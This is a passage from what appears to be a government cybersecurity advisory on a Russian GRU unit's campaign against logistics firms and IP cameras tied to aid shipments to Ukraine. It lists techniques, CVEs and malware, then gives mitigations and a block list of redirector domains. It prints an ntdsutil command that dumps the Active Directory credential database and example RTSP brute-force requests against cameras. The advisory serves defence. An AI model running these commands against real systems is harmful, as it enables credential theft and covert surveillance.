<li>Spearphishing for credentials [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/" target="_blank" title="T1566">T1566</a>]</li>
<li>Spearphishing delivering malware [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/" target="_blank" title="T1566">T1566</a>]</li>
<li>Outlook NTLM vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-23397" target="_blank" title="CVE-2023-23397">CVE-2023-23397</a>)</li>
<li>Roundcube vulnerabilities (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12641" target="_blank" title="CVE-2020-12641">CVE-2020-12641</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-35730" target="_blank" title="CVE-2020-35730">CVE-2020-35730</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44026" target="_blank" title="CVE-2021-44026">CVE-2021-44026</a>)</li>
<li>Exploitation of Internet-facing infrastructure, including corporate VPNs [<a href="https://attack.mitre.org/versions/v17/techniques/T1133/" target="_blank" title="T1133">T1133</a>], via public vulnerabilities and SQL injection [<a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a>]</li>
<li>Exploitation of WinRAR vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" title="CVE-2023-38831">CVE-2023-38831</a>)</li>
</ul>
<p>The actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as proxy malicious activity via devices with geolocation in proximity to the target [<a href="https://attack.mitre.org/versions/v17/techniques/T1665/" target="_blank" title="T1665">T1665</a>]. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited2" title="2">2</a>]
<h3>Credential Guessing/Brute Force</h3>
<p>Unit 26165 actors’ credential guessing [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/001/" target="_blank" title="T1110.001">T1110.001</a>] operations in this campaign exhibit some similar characteristics to those disclosed in the previous CSA “<a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank" title="Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments">Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments</a>.”&nbsp;[<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited3" title="3">3</a>] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/003/" target="_blank" title="T1090.003">T1090.003</a>]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [<a href="https://attack.mitre.org/versions/v17/techniques/T1573/" target="_blank" title="T1573">T1573</a>].&nbsp;</p>
<h3>Spearphishing</h3>
<p>GRU unit 26165 actors’ spearphishing emails included links [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a>] leading to fake login pages impersonating a variety of government entities and Western cloud email providers’ webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1586/002/" target="_blank" title="T1586.002">T1586.002</a>, <a href="https://attack.mitre.org/versions/v17/techniques/T1586/003/" target="_blank" title="T1586.003">T1586.003</a>]. The emails were typically written in the target’s native language and sent to a single targeted recipient.&nbsp;</p>
<p>Some campaigns employed multi-stage redirectors [<a href="https://attack.mitre.org/versions/v17/techniques/T1104/" target="_blank" title="T1104">T1104</a>] verifying IP-geolocation [<a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627.001">T1627.001</a>] and browser fingerprints [<a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627">T1627</a>] to protect credential harvesting infrastructure or provide multifactor authentication (MFA) [<a href="https://attack.mitre.org/versions/v17/techniques/T1111/" target="_blank" title="T1111">T1111</a>] and CAPTCHA relaying capabilities [<a href="https://attack.mitre.org/versions/v17/techniques/T1056/" target="_blank" title="T1056">T1056</a>]. Connecting endpoints failing the location checks were redirected to a benign URL [<a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627">T1627</a>], such as msn.com. Redirector services used include:</p>
<ul>
<li>Webhook[.]site</li>
<li>FrgeIO</li>
<li>InfinityFree</li>
<li>Dynu</li>
<li>Mocky</li>
<li>Pipedream</li>
<li>Mockbin[.]org</li>
</ul>
<p>The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables [<a href="https://attack.mitre.org/versions/v17/techniques/T1204/002/" target="_blank" title="T1204.002">T1204.002</a>] delivered via third-party services and redirectors [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a>], scripts in a mix of languages [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/" target="_blank" title="T1059">T1059</a>] (including BAT [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/003/" target="_blank" title="T1059.003">T1059.003</a>] and VBScript [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/005/" target="_blank" title="T1059.005">T1059.005</a>]) and links to hosted shortcuts [<a href="https://attack.mitre.org/versions/v17/techniques/T1204/001/" target="_blank" title="T1204.001">T1204.001</a>].</p>
<h3>CVE Usage</h3>
<p>Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-23397" target="_blank" title="CVE-2023-23397">CVE-2023-23397</a>) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [<a href="https://d3fend.mitre.org/technique/d3f:EncryptedTunnels/" target="_blank" title="T1187">T1187</a>]. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited4" title="4">4</a>],[<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited5" title="5">5</a>] These actors also used a series of Roundcube CVEs (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12641" target="_blank" title="CVE-2020-12641">CVE-2020-12641</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-35730" target="_blank" title="CVE-2020-35730">CVE-2020-35730</a>, and <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44026" target="_blank" title="CVE-2021-44026">CVE-2021-44026</a>) to execute arbitrary shell commands [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/005/" target="_blank" title="T1059">T1059</a>], gain access to victim email accounts, and retrieve sensitive data from email servers [<a href="https://attack.mitre.org/versions/v17/techniques/T1114/" target="_blank" title="T1114">T1114</a>].</p>
<p>Since at least fall 2023, the actors leveraged a WinRAR vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" title="CVE-2023-38831">CVE-2023-38831</a>) allowing for the execution of arbitrary code embedded in an archive as a means of initial access [<a href="https://attack.mitre.org/versions/v17/techniques/T1659/" target="_blank" title="T1659">T1659</a>]. The actors sent emails with malicious attachments [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/001/" target="_blank" title="T1566.001">T1566.001</a>] or embedded hyperlinks [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a>] that downloaded a malicious archive prepared using this CVE.&nbsp;</p>
<h3>Post-Compromise TTPs</h3>
<p>After an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [<a href="https://attack.mitre.org/versions/v17/techniques/T1589/002/" target="_blank" title="T1589.002">T1589.002</a>]. The actors also conducted reconnaissance of the cybersecurity department [<a href="https://attack.mitre.org/versions/v17/techniques/T1591/" target="_blank" title="T1591">T1591</a>], individuals responsible for coordinating transport [<a href="https://attack.mitre.org/versions/v17/techniques/T1591/004/" target="_blank" title="T1591.004">T1591.004</a>], and other companies cooperating with the victim entity [<a href="https://attack.mitre.org/versions/v17/techniques/T1591/002/" target="_blank" title="T1591.002">T1591.002</a>].</p>
<p>The actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [<a href="https://attack.mitre.org/versions/v17/tactics/TA0008/" target="_blank" title="TA0008">TA0008</a>]. Multiple Impacket scripts were used as .exe files, in addition to the python versions, depending on the victim environment. The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a>] to access additional hosts and attempt to dump Active&nbsp;Directory NTDS.dit domain databases [<a href="https://attack.mitre.org/versions/v17/techniques/T1003/003/" target="_blank" title="T1003.003">T1003.003</a>] using native Active Directory Domain Services commands, such as in&nbsp;<strong>Figure 2</strong>: Example Active Directory Domain Services command:</p>
<table>
<caption>Figure 2: Example Active Directory Domain Services command</caption>
<tbody>
<tr>
<td><code>C:Windowssystem32ntdsutil.exe "activate instance ntds" ifm "create full C:temp[a-z]{3}" quit quit</code></td>
</tr>
</tbody>
</table>
<p>Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The actors installed python [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/006/" target="_blank" title="T1059.006">T1059.006</a>] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [<a href="https://attack.mitre.org/versions/v17/techniques/T1560/" target="_blank" title="T1560">T1560</a>]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [<a href="https://attack.mitre.org/versions/v17/techniques/T1048/" target="_blank" title="T1048">T1048</a>].</p>
<p>Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors used manipulation of mailbox permissions [<a href="https://attack.mitre.org/versions/v17/techniques/T1098/002/" target="_blank" title="T1098.002">T1098.002</a>] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cybercommand blog. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited6" title="6">6</a>]
<p>After initial authentication, unit 26165 actors would change accounts&#8217; folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access [<a href="https://attack.mitre.org/versions/v17/techniques/T1556/006/" target="_blank" title="T1556.006">T1556.006</a>]. The actors leveraged python scripts to retrieve plaintext passwords via Group Policy Preferences [<a href="https://attack.mitre.org/versions/v17/techniques/T1552/006/" target="_blank" title="T1552.006">T1552.006</a>] using Get-GPPPassword.py and a modified ldap-dump.py to enumerate the Windows environment [<a href="https://attack.mitre.org/versions/v17/techniques/T1087/002/" target="_blank" title="T1087.002">T1087.002</a>] and conduct a brute force password spray [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a>] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [<a href="https://attack.mitre.org/versions/v17/techniques/T1070/001/" target="_blank" title="T1070.001">T1070.001</a>].</p>
<p>After gaining initial access to the network, the actors pursued further access to accounts with access to sensitive information on shipments, such as train schedules and shipping manifests. These accounts contained information on aid shipments to Ukraine, including:&nbsp;</p>
<ul>
<li>sender,</li>
<li>recipient,</li>
<li>train/plane/ship numbers,</li>
<li>point of departure,</li>
<li>destination,</li>
<li>container registration numbers,</li>
<li>travel route, and</li>
<li>cargo contents.&nbsp;</li>
</ul>
<p>In at least one instance, the actors attempted to use voice phishing [<a href="https://attack.mitre.org/versions/v17/techniques/T1566/004/" target="_blank" title="T1566.004">T1566.004</a>] to gain access to privileged accounts by impersonating IT staff.</p>
<h3>Malware</h3>
<p>Unit 26165’s use of malware in this campaign ranged from gaining initial access to establishing persistence and exfiltrating data. In some cases, the attack chain resulted in multiple pieces of malware being deployed in succession. The actors used dynamic link library (DLL) search order hijacking [<a href="https://attack.mitre.org/versions/v17/techniques/T1574/001/" target="_blank" title="T1574.001">T1574.001</a>] to facilitate malware execution. There were a number of known malware variants tied to this campaign against logistics sector victims, including:</p>
<ul>
<li>HEADLACE [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited7" title="7">7</a>]</li>
<li>MASEPIE [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited8" title="8">8</a>]</li>
</ul>
<p>While other malware variants, such as OCEANMAP and STEELHOOK, [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited8" title="8">8</a>] were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggest that they could be deployed against logistics and IT entities should the need arise.&nbsp;</p>
<h3>Persistence</h3>
<p>In addition to the abovementioned mailbox permissions abuse, unit 26165 actors also used scheduled tasks [<a href="https://attack.mitre.org/versions/v17/techniques/T1053/005/" target="_blank" title="T1053.005">T1053.005</a>], run keys [<a href="https://attack.mitre.org/versions/v17/techniques/T1547/001/" target="_blank" title="T1547.001">T1547.001</a>], and placed malicious shortcuts [<a href="https://attack.mitre.org/versions/v17/techniques/T1547/009/" target="_blank" title="T1547.009">T1547.009</a>] in the startup folder to establish persistence.&nbsp;</p>
<h3>Exfiltration</h3>
<p>GRU unit 26165 actors used a variety of methods for data exfiltration that varied based on the victim environment, including both malware and living off the land binaries. PowerShell commands [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank" title="T1059.001">T1059.001</a>] were often used to prepare data for exfiltration; for example, the actors prepared zip archives [<a href="https://attack.mitre.org/versions/v17/techniques/T1560/001/" target="_blank" title="T1560.001">T1560.001</a>] for upload to their own infrastructure.&nbsp;</p>
<p>The actors also used server data exchange protocols and Application Programming Interfaces (APIs) such as Exchange Web Services (EWS) and Internet Message Access Protocol (IMAP) [<a href="https://attack.mitre.org/versions/v17/techniques/T1114/002/" target="_blank" title="T1114.002">T1114.002</a>] to exfiltrate data from email servers. In multiple&nbsp;instances, the actors used periodic EWS queries [<a href="https://attack.mitre.org/versions/v17/techniques/T1119/" target="_blank" title="T1119">T1119</a>] to collect new emails sent and received since the last data exfiltration [<a href="https://attack.mitre.org/versions/v17/techniques/T1029/" target="_blank" title="T1029">T1029</a>]. The actors typically used infrastructure in close geographic proximity to the victim. Long gaps between exfiltration, the use of trusted and legitimate protocols, and the use of local infrastructure allowed for long-term collection of sensitive data to go undetected.&nbsp;</p>
<h2><strong>Connections to Targeting of IP Cameras</strong></h2>
<p>In addition to targeting logistics entities, unit 26165 actors likely used access to private cameras at key locations, such as near border crossings, military installations, and rail stations, to track the movement of materials into Ukraine. The actors also used legitimate municipal services, such as traffic cams.&nbsp;</p>
<p>The actors targeted Real Time Streaming Protocol (RTSP) servers hosting IP cameras primarily located in Ukraine as early as March 2022 in a large-scale campaign, which included attempts to enumerate devices [<a href="https://attack.mitre.org/versions/v17/techniques/T1592/" target="_blank" title="T1592">T1592</a>] and gain access to the cameras’ feeds [<a href="https://attack.mitre.org/versions/v17/techniques/T1125/" target="_blank" title="T1125">T1125</a>]. Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers, primarily hosting IP cameras [<a href="https://attack.mitre.org/versions/v17/techniques/T1090/002/" target="_blank" title="T1090.002">T1090.002</a>]. The DESCRIBE requests were crafted to obtain access to IP cameras located on logically distinct networks from that of the routers that received the request. The requests included Base64-encoded credentials for the RTSP server, which included publicly documented default credentials and likely generic attempts to brute force access to the devices [<a href="https://attack.mitre.org/versions/v17/techniques/T1110/" target="_blank" title="T1110">T1110</a>]. An example of an RTSP request is shown in&nbsp;<strong>Figure 3</strong>.</p>
<div>
<table>
<caption>Figure 3: Example RTSP request</caption>
<tbody>
<tr>
<td>
<p><code>DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0</code></p>
<p><code>CSeq: 1</code></p>
<p><code>Authorization: Basic &lt;Base64-encoded credentials&gt;</code></p>
<p><code>User-Agent: WebClient</code></p>
<p><code>Accept: application/sdp</code></p>
<br />
<p><code>DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0</code></p>
<p><code>CSeq: 2</code></p>
<p><code>Authorization: Digest username="admin", realm="[a-f0-9]{12}", algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}"</code></p>
<p><code>User-Agent: WebClient</code></p>
<p><code>Accept: application/sdp</code></p>
</td>
</tr>
</tbody>
</table>
<p>Successful RTSP 200 OK responses contained a snapshot of the IP camera&#8217;s image and IP camera metadata such as video codec, resolution, and other properties depending on the IP camera&#8217;s configuration.&nbsp;</p>
<p>From a sample available to the authoring agencies of over 10,000 cameras targeted via this effort, the geographic distribution of victims showed a strong focus on cameras in Ukraine and border countries, as shown in <strong>Table 1</strong>:</p>
<table class="tablesaw tablesaw-stack">
<caption>Table 1: Geographic distribution of targeted IP cameras</caption>
<thead>
<tr>
<th role="columnheader"><strong>Country</strong></th>
<th role="columnheader"><strong>Percentage of Total Attempts</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<td>81.0%</td>
</tr>
<tr>
<td>Romania</td>
<td>9.9%</td>
</tr>
<tr>
<td>Poland</td>
<td>4.0%</td>
</tr>
<tr>
<td>Hungary</td>
<td>2.8%</td>
</tr>
<tr>
<td>Slovakia</td>
<td>1.7%</td>
</tr>
<tr>
<td>Others</td>
<td>0.6%</td>
</tr>
</tbody>
</table>
</div>
<h2><strong>Mitigation Actions</strong></h2>
<h3><strong>General Security Mitigations</strong></h3>
<p><strong>Architecture and Configuration</strong></p>
<ul>
<li>Employ appropriate network segmentation [<a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation/" target="_blank" title="D3-NI">D3-NI</a>] and restrictions to limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions [<a href="https://d3fend.mitre.org/technique/d3f:AccessMediation/" target="_blank" title="D3-AMED">D3-AMED</a>].
<ul>
<li>Consider Zero Trust principles when designing systems. Base product choices on how those products can solve specific risks identified as part of the end-to-end design. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited9" title="9">9</a>]</li>
</ul>
</li>
<li>Ensure that host firewalls and network security appliances (e.g., firewalls) are configured to only allow legitimately needed data flows between devices and servers to prevent lateral movement [<a href="https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/" target="_blank" title="D3-ITF">D3-ITF</a>]. Alert on attempts to connect laterally between host devices or other unusual data flows.</li>
<li>Use automated tools to audit access logs for security concerns and identify anomalous access requests [<a href="https://d3fend.mitre.org/technique/d3f:ResourceAccessPatternAnalysis/" target="_blank" title="D3-RAPA">D3-RAPA</a>].</li>
<li>For organizations using on-premises authentication and email services, block and alert on NTLM/SMB requests to external infrastructure [<a href="https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/" target="_blank" title="D3-OTF">D3-OTF</a>].</li>
<li>Utilize endpoint, detection, and response (EDR) and other cybersecurity solutions on all systems, prioritizing high value systems with large amounts of sensitive data such as mail servers and domain controllers [<a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/" target="_blank" title="D3-PM">D3-PM</a>] first.
<ul>
<li>Perform threat and attack modeling to understand how sensitive systems may be compromised within an organization’s specific architecture and security controls. Use this to develop a monitoring strategy to detect compromise attempts and select appropriate products to enact this strategy.</li>
</ul>
</li>
<li>Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly [<a href="https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis/" target="_blank" title="D3-SFA">D3-SFA</a>].</li>
<li>Enable optional security features in Windows to harden endpoints and mitigate initial access techniques [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening/" target="_blank" title="D3-AH">D3-AH</a>]:
<ul>
<li>Enable attack surface reduction rules to prevent executable content from email [<a href="https://d3fend.mitre.org/technique/d3f:Application-basedProcessIsolation/" target="_blank" title="D3-ABPI">D3-ABPI</a>].</li>
<li>Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA% [<a href="https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting/" target="_blank" title="D3-EAL">D3-EAL</a>].</li>
<li>Unless users are involved in the development of scripts, limit the local execution of scripts (such as batch scripts, VBScript, JScript/JavaScript, and PowerShell [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited10" title="10">10</a>]) to known scripts [<a href="https://d3fend.mitre.org/technique/d3f:ExecutionIsolation/" target="_blank" title="D3-EI">D3-EI</a>], and audit execution attempts.</li>
<li>Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/" target="_blank" title="D3-ACH">D3-ACH</a>].</li>
</ul>
</li>
<li>Where feasible, implement allowlisting for applications and scripts to limit execution to only those needed for authorized activities, blocking all others by default&nbsp;[<a href="https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting/" target="_blank" title="D3-EAL">D3-EAL</a>].</li>
<li>Consider using <a href="https://github.com/SigmaHQ/sigma" target="_blank" title="open source SIGMA rules">open source SIGMA rules</a> as a baseline for detecting and alerting on suspicious file execution or command parameters [<a href="https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis/" target="_blank" title="D3-PSA">D3-PSA</a>].</li>
<li>Use services that provide enhanced browsing services and safe link checking [<a href="https://d3fend.mitre.org/technique/d3f:URLReputationAnalysis/" target="_blank" title="D3-URA">D3-URA</a>]. Significant reductions in successful spearphishing attempts were noted when email providers began offering link checking and automatic file detonation to block malicious content.</li>
<li>Where possible, block logins from public VPNs, including exit nodes in the same country as target systems, or, if they need to be allowed, alert on them for further investigation. Most organizations should not need to allow incoming traffic, especially logins to systems, from VPN services [<a href="https://d3fend.mitre.org/technique/d3f:NetworkAccessMediation/" target="_blank" title="D3-NAM">D3-NAM</a>].</li>
<li>Educate users to only use approved corporate systems for relevant government and military business and avoid the use of personal accounts on cloud email providers to conduct official business. Network administrators should also audit both email and web request logs to detect such activity.</li>
</ul>
<p>Many organizations may not need to allow outgoing traffic to hosting and API mocking services, which are frequently used by GRU unit 26165. Organizations should consider alerting on or blocking the following services, with exceptions allowlisted for legitimate activity [<a href="https://d3fend.mitre.org/technique/d3f:DNSDenylisting/" target="_blank" title="D3-DNSDL">D3-DNSDL</a>].</p>
<ul>
<li>*.000[.]pe</li>
<li>*.1cooldns[.]com</li>
<li>*.42web[.]io</li>
<li>*.4cloud[.]click</li>
<li>*.accesscan[.]org</li>
<li>*.bumbleshrimp[.]com</li>
<li>*.camdvr[.]org</li>
<li>*.casacam[.]net</li>
<li>*.ddnsfree[.]com</li>
<li>*.ddnsgeek[.]com</li>
<li>*.ddnsguru[.]com</li>
<li>*.dynuddns[.]com</li>
<li>*.dynuddns[.]net</li>
<li>*.free[.]nf</li>
<li>*.freeddns[.]org</li>
<li>*.frge[.]io</li>
<li>*.glize[.]com</li>
<li>*.great-site[.]net</li>
<li>*.infinityfreeapp[.]com</li>
<li>*.kesug[.]com</li>
<li>*.loseyourip[.]com</li>
<li>*.lovestoblog[.]com</li>
<li>*.mockbin[.]io</li>
<li>*.mockbin[.]org</li>
<li>*.mocky[.]io</li>
<li>*.mybiolink[.]io</li>
<li>*.mysynology[.]net</li>
<li>*.mywire[.]org</li>
<li>*.ngrok[.]io</li>
<li>*.ooguy[.]com</li>
<li>*.pipedream[.]net</li>
<li>*.rf[.]gd</li>
<li>*.urlbae[.]com</li>
<li>*.webhook[.]site</li>
<li>*.webhookapp[.]com</li>
<li>*.webredirect[.]org</li>
<li>*.wuaze[.]com</li>
</ul>
<p>Heuristic detections for web requests to new subdomains, including of the above providers, may uncover malicious phishing activity [<a href="https://d3fend.mitre.org/technique/d3f:DomainNameReputationAnalysis/" target="_blank" title="D3-DNRA">D3-DNRA</a>]. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.</p>
<p><strong>Identity and Access Management</strong></p>
<p>Organizations should take measures to ensure strong access controls and mitigate against common credential theft techniques:&nbsp;</p>
<ul>
<li>Use MFA with strong factors, such as passkeys or PKI smartcards, and require regular re-authentication [<a href="https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/" target="_blank" title="D3-MFA">D3-MFA</a>]. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited11" title="11">11</a>], [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited12" title="12">12</a>] Strong authentication factors are not guessable using dictionary techniques, so they resist brute force attempts.</li>
<li>Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts [<a href="https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis/" target="_blank" title="D3-JFAPA">D3-JFAPA</a>].</li>
<li>Separate privileged accounts by role and alert on misuse of privileged accounts [<a href="https://d3fend.mitre.org/technique/d3f:UserAccountPermissions/" target="_blank" title="D3-UAP">D3-UAP</a>]. For example, email administrator accounts should be different from domain administrator accounts.</li>
<li>Reduce reliance on passwords; instead, consider using services like single sign-on [<a href="https://d3fend.mitre.org/technique/d3f:Token-basedAuthentication/" target="_blank" title="D3-TBA">D3-TBA</a>].
<ul>
<li>For organizations using on-premises authentication and email services, plan to disable NTLM entirely and migrate to more robust authentication processes such as PKI certificate authentication.</li>
</ul>
</li>
<li>Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts [<a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening/" target="_blank" title="D3-CH">D3-CH</a>]. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited13" title="13">13</a>]</li>
<li>Use account throttling or account lockout [<a href="https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding/" target="_blank" title="D3-ANET">D3-ANET</a>]:
<ul>
<li>Throttling is preferred to lockout. Throttling progressively increases time delay between successive login attempts.</li>
<li>Account lockout can leave legitimate users unable to access their accounts and requires access to an account recovery process.</li>
<li>Account lockout can provide a malicious actor with an easy way to launch a Denial of Service (DoS).</li>
<li>If using lockout, then allowing 5 to 10 attempts before lockout is recommended.</li>
</ul>
</li>
<li>Use a service to check for compromised passwords before using them [<a href="https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/" target="_blank" title="D3-SPP">D3-SPP</a>]. For example, “Have I Been Pwned” can be used to check whether a password has been previously compromised without disclosing the potential password.</li>
<li>Change all default credentials [<a href="https://d3fend.mitre.org/technique/d3f:CredentialRotation/" target="_blank" title="D3-CRO">D3-CRO</a>] and disable protocols that use weak authentication (e.g., clear-text passwords or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/" target="_blank" title="D3-ACH">D3-ACH</a>] [<a href="https://d3fend.mitre.org/technique/d3f:EncryptedTunnels/" target="_blank" title="D3-ET">D3-ET</a>]. Always configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access. [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited13" title="13">13</a>]</li>
</ul>
<h3>IP Camera Mitigations</h3>
<p>The following mitigation techniques for IP cameras can be used to defend against this type of malicious activity:</p>
<ul>
<li>Ensure IP cameras are currently supported. Replace devices that are out of support.</li>
<li>Apply security patches and firmware updates to all IP cameras [<a href="https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/" target="_blank" title="D3-SU">D3-SU</a>].</li>
<li>Disable remote access to the IP camera, if unnecessary [<a href="https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/" target="_blank" title="D3-ITF">D3-ITF</a>].</li>
<li>Ensure cameras are protected by a security appliance, if possible, such as by using a firewall to prevent communication with the camera from IP addresses not on an allowlist [<a href="https://d3fend.mitre.org/technique/d3f:NetworkAccessMediation/" target="_blank" title="D3-NAM">D3-NAM</a>].</li>
<li>If remote access to IP camera feeds is required, ensure authentication is enabled [<a href="https://d3fend.mitre.org/technique/d3f:AgentAuthentication/" target="_blank" title="D3-AA">D3-AA</a>] and use a VPN to connect remotely [<a href="https://d3fend.mitre.org/technique/d3f:EncryptedTunnels/" target="_blank" title="D3-ET">D3-ET</a>]. Use MFA for management accounts if supported [<a href="https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/" target="_blank" title="D3-MFA">D3-MFA</a>].</li>
<li>Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers [<a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation/" target="_blank" title="D3-NI">D3-NI</a>].</li>
<li>Turn off other ports/services not in use (e.g., FTP, web interface, etc.) [<a href="https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/" target="_blank" title="D3-ACH">D3-ACH</a>].</li>
<li>If supported, enable authenticated RTSP access only [<a href="https://d3fend.mitre.org/technique/d3f:AgentAuthentication/" target="_blank" title="D3-AA">D3-AA</a>].</li>
<li>Review all authentication activity for remote access to make sure it is valid and expected [<a href="https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis/" target="_blank" title="D3-UBA">D3-UBA</a>]. Investigate any unexpected or unusual activity.</li>
<li>Audit IP camera user accounts to ensure they are an accurate reflection of your organization and that they are being used as expected [<a href="https://d3fend.mitre.org/technique/d3f:UserAccountPermissions/" target="_blank" title="D3-UAP">D3-UAP</a>].</li>
<li>Configure, tune, and monitor logging—if available—on the IP camera.</li>
</ul>
<h2><strong>Indicators of Compromise (IOCs)</strong></h2>
<p><strong>Note</strong>: Specific IoCs may no longer be actor controlled, may themselves be compromised infrastructure or email accounts, or may be shared infrastructure such as public VPN or Tor exit nodes. Care should be taken when basing triaging logs or developing detection rules on these indicators. GRU unit 26165 almost certainly uses extensive further infrastructure and TTPs not specifically listed in this report.</p>
